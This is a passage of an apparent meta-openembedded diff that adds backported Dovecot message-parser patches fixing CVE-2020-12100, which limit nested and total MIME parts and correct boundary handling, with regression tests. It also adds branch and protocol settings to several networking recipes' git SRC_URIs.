message_part *parts, *part; + const char *broken_reason; +@@ -32,7 +32,7 @@ struct message_parser_ctx { + enum message_header_parser_flags hdr_flags; + enum message_parser_flags flags; + +- const char *last_boundary; ++ char *last_boundary; + struct message_boundary *boundaries; + + struct message_part **next_part; +@@ -223,10 +223,24 @@ static void message_part_finish(struct message_parser_ctx *ctx) + ctx->part = ctx->part->parent; + } + ++static void message_boundary_free(struct message_boundary *b) ++{ ++ i_free(b->boundary); ++ i_free(b); ++} ++ + static void + boundary_remove_until(struct message_parser_ctx *ctx, + struct message_boundary *boundary) + { ++ while (ctx->boundaries != boundary) { ++ struct message_boundary *cur = ctx->boundaries; ++ ++ i_assert(cur != NULL); ++ ctx->boundaries = cur->next; ++ message_boundary_free(cur); ++ ++ } + ctx->boundaries = boundary; + } + +@@ -234,15 +248,14 @@ static void parse_next_body_multipart_init(struct message_parser_ctx *ctx) + { + struct message_boundary *b; + +- b = p_new(ctx->parser_pool, struct message_boundary, 1); ++ b = i_new(struct message_boundary, 1); + b->part = ctx->part; + b->boundary = ctx->last_boundary; ++ ctx->last_boundary = NULL; + b->len = strlen(b->boundary); + + b->next = ctx->boundaries; + ctx->boundaries = b; +- +- ctx->last_boundary = NULL; + } + + static int parse_next_body_message_rfc822_init(struct message_parser_ctx *ctx, +@@ -359,6 +372,8 @@ static int parse_part_finish(struct message_parser_ctx *ctx, + struct message_block *block_r, bool first_line) + { + size_t line_size; ++ size_t boundary_len = boundary->len; ++ bool boundary_epilogue_found = boundary->epilogue_found; + + i_assert(ctx->last_boundary == NULL); + +@@ -391,7 +406,7 @@ static int parse_part_finish(struct message_parser_ctx *ctx, + i_assert(block_r->data[0] == '\n'); + line_size = 1; + } +- line_size += 2 + boundary->len + (boundary->epilogue_found ? 2 : 0); ++ line_size += 2 + boundary_len + (boundary_epilogue_found ? 2 : 0); + i_assert(block_r->size >= ctx->skip + line_size); + block_r->size = line_size; + parse_body_add_block(ctx, block_r); +@@ -553,9 +568,9 @@ static void parse_content_type(struct message_parser_ctx *ctx, + for (; *results != NULL; results += 2) { + if (strcasecmp(results[0], "boundary") == 0) { + /* truncate excessively long boundaries */ ++ i_free(ctx->last_boundary); + ctx->last_boundary = +- p_strndup(ctx->parser_pool, results[1], +- BOUNDARY_STRING_MAX_LEN); ++ i_strndup(results[1], BOUNDARY_STRING_MAX_LEN); + break; + } + } +@@ -678,7 +693,7 @@ static int parse_next_header(struct message_parser_ctx *ctx, + i_assert(!ctx->multipart); + part->flags = 0; + } +- ctx->last_boundary = NULL; ++ i_free(ctx->last_boundary); + + if (!ctx->part_seen_content_type || + (part->flags & MESSAGE_PART_FLAG_IS_MIME) == 0) { +@@ -1081,11 +1096,8 @@ message_parser_init_int(struct istream *input, + enum message_parser_flags flags) + { + struct message_parser_ctx *ctx; +- pool_t pool; + +- pool = pool_alloconly_create("Message Parser", 1024); +- ctx = p_new(pool, struct message_parser_ctx, 1); +- ctx->parser_pool = pool; ++ ctx = i_new(struct message_parser_ctx, 1); + ctx->hdr_flags = hdr_flags; + ctx->flags = flags; + ctx->input = input; +@@ -1105,7 +1117,7 @@ message_parser_init(pool_t part_pool, struct istream *input, + ctx->parts = ctx->part = p_new(part_pool, struct message_part, 1); + ctx->next_part = &ctx->part->children; + ctx->parse_next_block = parse_next_header_init; +- p_array_init(&ctx->next_part_stack, ctx->parser_pool, 4); ++ i_array_init(&ctx->next_part_stack, 4); + return ctx; + } + +@@ -1146,8 +1158,12 @@ int message_parser_deinit_from_parts(struct message_parser_ctx **_ctx, + + if (ctx->hdr_parser_ctx != NULL) + message_parse_header_deinit(&ctx->hdr_parser_ctx); ++ boundary_remove_until(ctx, NULL); + i_stream_unref(&ctx->input); +- pool_unref(&ctx->parser_pool); ++ if (array_is_created(&ctx->next_part_stack)) ++ array_free(&ctx->next_part_stack); ++ i_free(ctx->last_boundary); ++ i_free(ctx); + i_assert(ret < 0 || *parts_r != NULL); + return ret; + } +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0010-lib-mail-message-parser-Support-limiting-max-number-.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0010-lib-mail-message-parser-Support-limiting-max-number-.patch new file mode 100644 index 0000000000..ae52544665 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0010-lib-mail-message-parser-Support-limiting-max-number-.patch @@ -0,0 +1,188 @@ +From df9e0d358ef86e3342525dcdefcf79dc2d749a30 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 16:59:40 +0300 +Subject: [PATCH 10/13] lib-mail: message-parser - Support limiting max number + of nested MIME parts + +The default is to allow 100 nested MIME parts. When the limit is reached, +the innermost MIME part's body contains all the rest of the inner bodies +until a parent MIME part is reached. +--- + src/lib-mail/message-parser.c | 43 +++++++++++++++++++++++++++++++------- + src/lib-mail/test-message-parser.c | 31 +++++++++++++++++++++++++++ + 2 files changed, 67 insertions(+), 7 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 8970d8e0e..721615f76 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -13,6 +13,8 @@ + #define BOUNDARY_STRING_MAX_LEN (70 + 10) + #define BOUNDARY_END_MAX_LEN (BOUNDARY_STRING_MAX_LEN + 2 + 2) + ++#define MESSAGE_PARSER_DEFAULT_MAX_NESTED_MIME_PARTS 100 ++ + struct message_boundary { + struct message_boundary *next; + +@@ -28,9 +30,11 @@ struct message_parser_ctx { + struct istream *input; + struct message_part *parts, *part; + const char *broken_reason; ++ unsigned int nested_parts_count; + + enum message_header_parser_flags hdr_flags; + enum message_parser_flags flags; ++ unsigned int max_nested_mime_parts; + + char *last_boundary; + struct message_boundary *boundaries; +@@ -206,6 +210,8 @@ message_part_append(struct message_parser_ctx *ctx) + ctx->next_part = &part->children; + + ctx->part = part; ++ ctx->nested_parts_count++; ++ i_assert(ctx->nested_parts_count < ctx->max_nested_mime_parts); + } + + static void message_part_finish(struct message_parser_ctx *ctx) +@@ -213,8 +219,12 @@ static void message_part_finish(struct message_parser_ctx *ctx) + struct message_part **const *parent_next_partp; + unsigned int count = array_count(&ctx->next_part_stack); + ++ i_assert(ctx->nested_parts_count > 0); ++ ctx->nested_parts_count--; ++ + parent_next_partp = array_idx(&ctx->next_part_stack, count-1); + array_delete(&ctx->next_part_stack, count-1, 1); ++ + ctx->next_part = *parent_next_partp; + + message_size_add(&ctx->part->parent->body_size, &ctx->part->body_size); +@@ -592,6 +602,11 @@ static bool block_is_at_eoh(const struct message_block *block) + return FALSE; + } + ++static bool parse_too_many_nested_mime_parts(struct message_parser_ctx *ctx) ++{ ++ return ctx->nested_parts_count > ctx->max_nested_mime_parts; ++} ++ + #define MUTEX_FLAGS \ + (MESSAGE_PART_FLAG_MESSAGE_RFC822 | MESSAGE_PART_FLAG_MULTIPART) + +@@ -616,8 +631,12 @@ static int parse_next_header(struct message_parser_ctx *ctx, + "\n--boundary" belongs to us or to a previous boundary. + this is a problem if the boundary prefixes are identical, + because MIME requires only the prefix to match. */ +- parse_next_body_multipart_init(ctx); +- ctx->multipart = TRUE; ++ if (!parse_too_many_nested_mime_parts(ctx)) { ++ parse_next_body_multipart_init(ctx); ++ ctx->multipart = TRUE; ++ } else { ++ part->flags &= ~MESSAGE_PART_FLAG_MULTIPART; ++ } + } + + /* before parsing the header see if we can find a --boundary from here. +@@ -721,12 +740,16 @@ static int parse_next_header(struct message_parser_ctx *ctx, + i_assert(ctx->last_boundary == NULL); + ctx->multipart = FALSE; + ctx->parse_next_block = parse_next_body_to_boundary; +- } else if (part->flags & MESSAGE_PART_FLAG_MESSAGE_RFC822) ++ } else if ((part->flags & MESSAGE_PART_FLAG_MESSAGE_RFC822) != 0 && ++ !parse_too_many_nested_mime_parts(ctx)) { + ctx->parse_next_block = parse_next_body_message_rfc822_init; +- else if (ctx->boundaries != NULL) +- ctx->parse_next_block = parse_next_body_to_boundary; +- else +- ctx->parse_next_block = parse_next_body_to_eof; ++ } else { ++ part->flags &= ~MESSAGE_PART_FLAG_MESSAGE_RFC822; ++ if (ctx->boundaries != NULL) ++ ctx->parse_next_block = parse_next_body_to_boundary; ++ else ++ ctx->parse_next_block = parse_next_body_to_eof; ++ } + + ctx->want_count = 1; + +@@ -1100,6 +1123,8 @@ message_parser_init_int(struct istream *input, + ctx = i_new(struct message_parser_ctx, 1); + ctx->hdr_flags = hdr_flags; + ctx->flags = flags; ++ ctx->max_nested_mime_parts = ++ MESSAGE_PARSER_DEFAULT_MAX_NESTED_MIME_PARTS; + ctx->input = input; + i_stream_ref(input); + return ctx; +@@ -1159,6 +1184,10 @@ int message_parser_deinit_from_parts(struct message_parser_ctx **_ctx, + if (ctx->hdr_parser_ctx != NULL) + message_parse_header_deinit(&ctx->hdr_parser_ctx); + boundary_remove_until(ctx, NULL); ++ /* caller might have stopped the parsing early */ ++ i_assert(ctx->nested_parts_count == 0 || ++ i_stream_have_bytes_left(ctx->input)); ++ + i_stream_unref(&ctx->input); + if (array_is_created(&ctx->next_part_stack)) + array_free(&ctx->next_part_stack); +diff --git a/src/lib-mail/test-message-parser.c b/src/lib-mail/test-message-parser.c +index 94aa3eb7c..481d05942 100644 +--- a/src/lib-mail/test-message-parser.c ++++ b/src/lib-mail/test-message-parser.c +@@ -166,6 +166,36 @@ static void test_message_parser_small_blocks(void) + test_end(); + } + ++static void test_message_parser_stop_early(void) ++{ ++ struct message_parser_ctx *parser; ++ struct istream *input; ++ struct message_part *parts; ++ struct message_block block; ++ unsigned int i; ++ pool_t pool; ++ int ret; ++ ++ test_begin("message parser stop early"); ++ pool = pool_alloconly_create("message parser", 10240); ++ input = test_istream_create(test_msg); ++ ++ test_istream_set_allow_eof(input, FALSE); ++ for (i = 1; i <= TEST_MSG_LEN+1; i++) { ++ i_stream_seek(input, 0); ++ test_istream_set_size(input, i); ++ parser = message_parser_init(pool, input, 0, 0); ++ while ((ret = message_parser_parse_next_block(parser, ++ &block)) > 0) ; ++ test_assert(ret == 0); ++ message_parser_deinit(&parser, &parts); ++ } ++ ++ i_stream_unref(&input); ++ pool_unref(&pool); ++ test_end(); ++} ++ + static void test_message_parser_truncated_mime_headers(void) + { + static const char input_msg[] = +@@ -740,6 +770,7 @@ int main(void) + { + static void (*test_functions[])(void) = { + test_message_parser_small_blocks, ++ test_message_parser_stop_early, + test_message_parser_truncated_mime_headers, + test_message_parser_truncated_mime_headers2, + test_message_parser_truncated_mime_headers3, +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0011-lib-mail-message-parser-Support-limiting-max-number-.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0011-lib-mail-message-parser-Support-limiting-max-number-.patch new file mode 100644 index 0000000000..52848bf3a7 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0011-lib-mail-message-parser-Support-limiting-max-number-.patch @@ -0,0 +1,87 @@ +From d7bba401dd234802bcdb55ff27dfb99bffdab804 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 17:09:33 +0300 +Subject: [PATCH 11/13] lib-mail: message-parser - Support limiting max number + of MIME parts + +The default is to allow 10000 MIME parts. When it's reached, no more +MIME boundary lines will be recognized, so the rest of the mail belongs +to the last added MIME part. +--- + src/lib-mail/message-parser.c | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 721615f76..646307802 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -14,6 +14,7 @@ + #define BOUNDARY_END_MAX_LEN (BOUNDARY_STRING_MAX_LEN + 2 + 2) + + #define MESSAGE_PARSER_DEFAULT_MAX_NESTED_MIME_PARTS 100 ++#define MESSAGE_PARSER_DEFAULT_MAX_TOTAL_MIME_PARTS 10000 + + struct message_boundary { + struct message_boundary *next; +@@ -31,10 +32,12 @@ struct message_parser_ctx { + struct message_part *parts, *part; + const char *broken_reason; + unsigned int nested_parts_count; ++ unsigned int total_parts_count; + + enum message_header_parser_flags hdr_flags; + enum message_parser_flags flags; + unsigned int max_nested_mime_parts; ++ unsigned int max_total_mime_parts; + + char *last_boundary; + struct message_boundary *boundaries; +@@ -211,7 +214,9 @@ message_part_append(struct message_parser_ctx *ctx) + + ctx->part = part; + ctx->nested_parts_count++; ++ ctx->total_parts_count++; + i_assert(ctx->nested_parts_count < ctx->max_nested_mime_parts); ++ i_assert(ctx->total_parts_count <= ctx->max_total_mime_parts); + } + + static void message_part_finish(struct message_parser_ctx *ctx) +@@ -296,6 +301,12 @@ boundary_line_find(struct message_parser_ctx *ctx, + return -1; + } + ++ if (ctx->total_parts_count >= ctx->max_total_mime_parts) { ++ /* can't add any more MIME parts. just stop trying to find ++ more boundaries. */ ++ return -1; ++ } ++ + /* need to find the end of line */ + data += 2; + size -= 2; +@@ -1125,6 +1136,8 @@ message_parser_init_int(struct istream *input, + ctx->flags = flags; + ctx->max_nested_mime_parts = + MESSAGE_PARSER_DEFAULT_MAX_NESTED_MIME_PARTS; ++ ctx->max_total_mime_parts = ++ MESSAGE_PARSER_DEFAULT_MAX_TOTAL_MIME_PARTS; + ctx->input = input; + i_stream_ref(input); + return ctx; +@@ -1142,6 +1155,7 @@ message_parser_init(pool_t part_pool, struct istream *input, + ctx->parts = ctx->part = p_new(part_pool, struct message_part, 1); + ctx->next_part = &ctx->part->children; + ctx->parse_next_block = parse_next_header_init; ++ ctx->total_parts_count = 1; + i_array_init(&ctx->next_part_stack, 4); + return ctx; + } +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0012-lib-mail-Fix-handling-trailing-in-MIME-boundaries.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0012-lib-mail-Fix-handling-trailing-in-MIME-boundaries.patch new file mode 100644 index 0000000000..a81177d2ba --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0012-lib-mail-Fix-handling-trailing-in-MIME-boundaries.patch @@ -0,0 +1,133 @@ +From 0c9d56b41b992a868f299e05677a67c4d0495523 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 2 Jul 2020 17:31:19 +0300 +Subject: [PATCH 12/13] lib-mail: Fix handling trailing "--" in MIME boundaries + +Broken by 5b8ec27fae941d06516c30476dcf4820c6d200ab +--- + src/lib-mail/message-parser.c | 14 ++++++++---- + src/lib-mail/test-message-parser.c | 46 ++++++++++++++++++++++++++++++++++++++ + 2 files changed, 56 insertions(+), 4 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 646307802..175d4b488 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -75,7 +75,7 @@ static int preparsed_parse_next_header_init(struct message_parser_ctx *ctx, + + static struct message_boundary * + boundary_find(struct message_boundary *boundaries, +- const unsigned char *data, size_t len) ++ const unsigned char *data, size_t len, bool trailing_dashes) + { + struct message_boundary *best = NULL; + +@@ -89,7 +89,11 @@ boundary_find(struct message_boundary *boundaries, + memcmp(boundaries->boundary, data, boundaries->len) == 0 && + (best == NULL || best->len < boundaries->len)) { + best = boundaries; +- if (best->len == len) { ++ /* If we see "foo--", it could either mean that there ++ is a boundary named "foo" that ends now or there's ++ a boundary "foo--" which continues. */ ++ if (best->len == len || ++ (best->len == len-2 && trailing_dashes)) { + /* This is exactly the wanted boundary. There + can't be a better one. */ + break; +@@ -319,6 +323,7 @@ boundary_line_find(struct message_parser_ctx *ctx, + return 0; + } + size_t find_size = size; ++ bool trailing_dashes = FALSE; + + if (lf_pos != NULL) { + find_size = lf_pos - data; +@@ -326,11 +331,12 @@ boundary_line_find(struct message_parser_ctx *ctx, + find_size--; + if (find_size > 2 && data[find_size-1] == '-' && + data[find_size-2] == '-') +- find_size -= 2; ++ trailing_dashes = TRUE; + } else if (find_size > BOUNDARY_END_MAX_LEN) + find_size = BOUNDARY_END_MAX_LEN; + +- *boundary_r = boundary_find(ctx->boundaries, data, find_size); ++ *boundary_r = boundary_find(ctx->boundaries, data, find_size, ++ trailing_dashes); + if (*boundary_r == NULL) + return -1; + +diff --git a/src/lib-mail/test-message-parser.c b/src/lib-mail/test-message-parser.c +index 481d05942..113454ea0 100644 +--- a/src/lib-mail/test-message-parser.c ++++ b/src/lib-mail/test-message-parser.c +@@ -510,6 +510,51 @@ static const char input_msg[] = + test_end(); + } + ++static void test_message_parser_trailing_dashes(void) ++{ ++static const char input_msg[] = ++"Content-Type: multipart/mixed; boundary=\"a--\"\n" ++"\n" ++"--a--\n" ++"Content-Type: multipart/mixed; boundary=\"a----\"\n" ++"\n" ++"--a----\n" ++"Content-Type: text/plain\n" ++"\n" ++"body\n" ++"--a------\n" ++"Content-Type: text/html\n" ++"\n" ++"body2\n" ++"--a----"; ++ struct message_parser_ctx *parser; ++ struct istream *input; ++ struct message_part *parts; ++ struct message_block block; ++ pool_t pool; ++ int ret; ++ ++ test_begin("message parser trailing dashes"); ++ pool = pool_alloconly_create("message parser", 10240); ++ input = test_istream_create(input_msg); ++ ++ parser = message_parser_init(pool, input, 0, 0); ++ while ((ret = message_parser_parse_next_block(parser, &block)) > 0) ; ++ test_assert(ret < 0); ++ message_parser_deinit(&parser, &parts); ++ ++ test_assert(parts->children_count == 2); ++ test_assert(parts->children->next == NULL); ++ test_assert(parts->children->children_count == 1); ++ test_assert(parts->children->children->next == NULL); ++ test_assert(parts->children->children->children_count == 0); ++ ++ test_parsed_parts(input, parts); ++ i_stream_unref(&input); ++ pool_unref(&pool); ++ test_end(); ++} ++ + static void test_message_parser_continuing_mime_boundary(void) + { + static const char input_msg[] = +@@ -777,6 +822,7 @@ int main(void) + test_message_parser_empty_multipart, + test_message_parser_duplicate_mime_boundary, + test_message_parser_garbage_suffix_mime_boundary, ++ test_message_parser_trailing_dashes, + test_message_parser_continuing_mime_boundary, + test_message_parser_continuing_truncated_mime_boundary, + test_message_parser_long_mime_boundary, +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0013-lib-mail-Fix-parse_too_many_nested_mime_parts.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0013-lib-mail-Fix-parse_too_many_nested_mime_parts.patch new file mode 100644 index 0000000000..97068345fb --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0013-lib-mail-Fix-parse_too_many_nested_mime_parts.patch @@ -0,0 +1,32 @@ +From f77a2b6c3ffe2ea96f4a4b05ec38dc9d53266ecb Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Wed, 27 May 2020 11:35:55 +0300 +Subject: [PATCH 13/13] lib-mail: Fix parse_too_many_nested_mime_parts() + +This was originally correct, until it was "optimized" wrong and got merged. +--- + src/lib-mail/message-parser.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 175d4b488..5b11772ff 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -621,7 +621,7 @@ static bool block_is_at_eoh(const struct message_block *block) + + static bool parse_too_many_nested_mime_parts(struct message_parser_ctx *ctx) + { +- return ctx->nested_parts_count > ctx->max_nested_mime_parts; ++ return ctx->nested_parts_count+1 >= ctx->max_nested_mime_parts; + } + + #define MUTEX_FLAGS \ +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/buffer_free_fix.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/buffer_free_fix.patch new file mode 100644 index 0000000000..44f6564f89 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/buffer_free_fix.patch @@ -0,0 +1,27 @@ +From 1a6ff0beebf0ab0c71081eaff1d5d7fd26015a94 Mon Sep 17 00:00:00 2001 +From: Josef 'Jeff' Sipek +Date: Tue, 19 Sep 2017 13:26:57 +0300 +Subject: [PATCH] lib: buffer_free(NULL) should be a no-op + +--- + src/lib/buffer.c | 3 +++ + 1 file changed, 3 insertions(+) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +--- a/src/lib/buffer.c ++++ b/src/lib/buffer.c +@@ -148,6 +148,9 @@ void buffer_free(buffer_t **_buf) + { + struct real_buffer *buf = (struct real_buffer *)*_buf; + ++ if (buf == NULL) ++ return; ++ + *_buf = NULL; + if (buf->alloced) + p_free(buf->pool, buf->w_buffer); diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot_2.2.36.4.bb b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot_2.2.36.4.bb index e21a94ad64..29905196b6 100644 --- a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot_2.2.36.4.bb +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot_2.2.36.4.bb @@ -10,6 +10,22 @@ SRC_URI = "http://dovecot.org/releases/2.2/dovecot-${PV}.tar.gz \ file://dovecot.service \ file://dovecot.socket \ file://0001-doveadm-Fix-parallel-build.patch \ + file://0001-lib-mail-message-parser-Add-a-message_part_finish-he.patch \ + file://0002-lib-mail-message-parser-Change-message_part_append-t.patch \ + file://0003-lib-mail-message-parser-Optimize-updating-children_c.patch \ + file://0004-lib-mail-message-parser-Optimize-appending-new-part-.patch \ + file://0005-lib-mail-message-parser-Minor-code-cleanup-to-findin.patch \ + file://0006-lib-mail-message-parser-Truncate-excessively-long-MI.patch \ + file://0007-lib-mail-message-parser-Optimize-boundary-lookups-wh.patch \ + file://0008-lib-mail-message-parser-Add-boundary_remove_until-he.patch \ + file://0009-lib-mail-message-parser-Don-t-use-memory-pool-for-pa.patch \ + file://0010-lib-mail-message-parser-Support-limiting-max-number-.patch \ + file://0011-lib-mail-message-parser-Support-limiting-max-number-.patch \ + file://0012-lib-mail-Fix-handling-trailing-in-MIME-boundaries.patch \ + file://0013-lib-mail-Fix-parse_too_many_nested_mime_parts.patch \ + file://buffer_free_fix.patch \ + file://0002-lib-ntlm-Check-buffer-length-on-responses.patch \ + file://0001-auth-mech-rpa-Fail-on-zero-len-buffer.patch \ " SRC_URI[md5sum] = "66c4d71858b214afee5b390ee602dee2" diff --git a/meta-openembedded/meta-networking/recipes-support/drbd/drbd-utils_9.12.0.bb b/meta-openembedded/meta-networking/recipes-support/drbd/drbd-utils_9.12.0.bb index 5dabdd51d0..cad2fa7d71 100644 --- a/meta-openembedded/meta-networking/recipes-support/drbd/drbd-utils_9.12.0.bb +++ b/meta-openembedded/meta-networking/recipes-support/drbd/drbd-utils_9.12.0.bb @@ -8,13 +8,14 @@ SECTION = "admin" LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=5574c6965ae5f583e55880e397fbb018" -SRC_URI = "git://github.com/LINBIT/drbd-utils;name=drbd-utils \ - git://github.com/LINBIT/drbd-headers;name=drbd-headers;destsuffix=git/drbd-headers \ +SRC_URI = "git://github.com/LINBIT/drbd-utils;name=drbd-utils;branch=master;protocol=https \ + git://github.com/LINBIT/drbd-headers;name=drbd-headers;destsuffix=git/drbd-headers;branch=master;protocol=https \ ${@bb.utils.contains('DISTRO_FEATURES','usrmerge','file://0001-drbd-utils-support-usrmerge.patch','',d)} \ " # v9.12.0 SRCREV_drbd-utils = "91629a4cce49ca0d4f917fe0bffa25cfe8db3052" SRCREV_drbd-headers = "233006b4d26cf319638be0ef6d16ec7dee287b66" +SRCREV_FORMAT = "drbd-utils_drbd-headers" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/geoip/geoip-perl_1.51.bb b/meta-openembedded/meta-networking/recipes-support/geoip/geoip-perl_1.51.bb index ed5c3a9799..8301c65bfa 100644 --- a/meta-openembedded/meta-networking/recipes-support/geoip/geoip-perl_1.51.bb +++ b/meta-openembedded/meta-networking/recipes-support/geoip/geoip-perl_1.51.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=e4f3ea6e9b28af88dc0321190a1f8250" S = "${WORKDIR}/git" SRCREV = "4cdfdc38eca237c19c22a8b90490446ce6d970fa" -SRC_URI = "git://github.com/maxmind/geoip-api-perl.git;protocol=https; \ +SRC_URI = "git://github.com/maxmind/geoip-api-perl.git;protocol=https;branch=master \ file://run-ptest \ " diff --git a/meta-openembedded/meta-networking/recipes-support/geoip/geoip_1.6.12.bb b/meta-openembedded/meta-networking/recipes-support/geoip/geoip_1.6.12.bb index 4271c2e155..3be1313d38 100644 --- a/meta-openembedded/meta-networking/recipes-support/geoip/geoip_1.6.12.bb +++ b/meta-openembedded/meta-networking/recipes-support/geoip/geoip_1.6.12.bb @@ -10,7 +10,7 @@ SECTION = "libdevel" GEOIP_DATABASE_VERSION = "20181205" -SRC_URI = "git://github.com/maxmind/geoip-api-c.git \ +SRC_URI = "git://github.com/maxmind/geoip-api-c.git;branch=master;protocol=https \ http://sources.openembedded.org/GeoIP.dat.${GEOIP_DATABASE_VERSION}.gz;apply=no;name=GeoIP-dat; \ http://sources.openembedded.org/GeoIPv6.dat.${GEOIP_DATABASE_VERSION}.gz;apply=no;name=GeoIPv6-dat; \ http://sources.openembedded.org/GeoLiteCity.dat.${GEOIP_DATABASE_VERSION}.gz;apply=no;name=GeoLiteCity-dat; \ diff --git a/meta-openembedded/meta-networking/recipes-support/ifenslave/ifenslave_2.9.bb b/meta-openembedded/meta-networking/recipes-support/ifenslave/ifenslave_2.9.bb index 125b59e760..9c15490dcb 100644 --- a/meta-openembedded/meta-networking/recipes-support/ifenslave/ifenslave_2.9.bb +++ b/meta-openembedded/meta-networking/recipes-support/ifenslave/ifenslave_2.9.bb @@ -9,7 +9,7 @@ inherit manpages MAN_PKG = "${PN}" SRCREV = "42bfbb9beb924672ca86b86e9679ac3d6b87d992" -SRC_URI = "git://salsa.debian.org/debian/ifenslave.git;protocol=https" +SRC_URI = "git://salsa.debian.org/debian/ifenslave.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/ipcalc/ipcalc_0.2.3.bb b/meta-openembedded/meta-networking/recipes-support/ipcalc/ipcalc_0.2.3.bb index ad0ec27001..59e540a710 100644 --- a/meta-openembedded/meta-networking/recipes-support/ipcalc/ipcalc_0.2.3.bb +++ b/meta-openembedded/meta-networking/recipes-support/ipcalc/ipcalc_0.2.3.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" S = "${WORKDIR}/git" SRCREV = "c3ee70c878b9c5833a77a1f339f1ca4dc6f225c5" SRC_URI = "\ - git://github.com/nmav/ipcalc.git;protocol=https; \ + git://github.com/nmav/ipcalc.git;protocol=https;branch=master \ file://0001-Makefile-pass-extra-linker-flags.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-support/lksctp-tools/lksctp-tools_1.0.18.bb b/meta-openembedded/meta-networking/recipes-support/lksctp-tools/lksctp-tools_1.0.18.bb index 3cabc4ff8d..7a229c7b1e 100644 --- a/meta-openembedded/meta-networking/recipes-support/lksctp-tools/lksctp-tools_1.0.18.bb +++ b/meta-openembedded/meta-networking/recipes-support/lksctp-tools/lksctp-tools_1.0.18.bb @@ -14,7 +14,7 @@ PV .= "+git${SRCPV}" LK_REL = "1.0.18" SRC_URI = " \ - git://github.com/sctp/lksctp-tools.git \ + git://github.com/sctp/lksctp-tools.git;branch=master;protocol=https \ file://0001-withsctp-use-PACKAGE_VERSION-in-withsctp.h.patch \ file://0001-configure.ac-add-CURRENT-REVISION-and-AGE-for-libsct.patch \ file://0001-build-fix-netinet-sctp.h-not-to-be-installed.patch \ diff --git a/meta-openembedded/meta-networking/recipes-support/lowpan-tools/lowpan-tools_git.bb b/meta-openembedded/meta-networking/recipes-support/lowpan-tools/lowpan-tools_git.bb index 5917cfb3e1..e073561655 100644 --- a/meta-openembedded/meta-networking/recipes-support/lowpan-tools/lowpan-tools_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/lowpan-tools/lowpan-tools_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" DEPENDS = "flex-native bison-native libnl python" PV = "0.3.1+git${SRCPV}" -SRC_URI = "git://github.com/linux-wpan/lowpan-tools \ +SRC_URI = "git://github.com/linux-wpan/lowpan-tools;branch=master;protocol=https \ file://no-help2man.patch \ 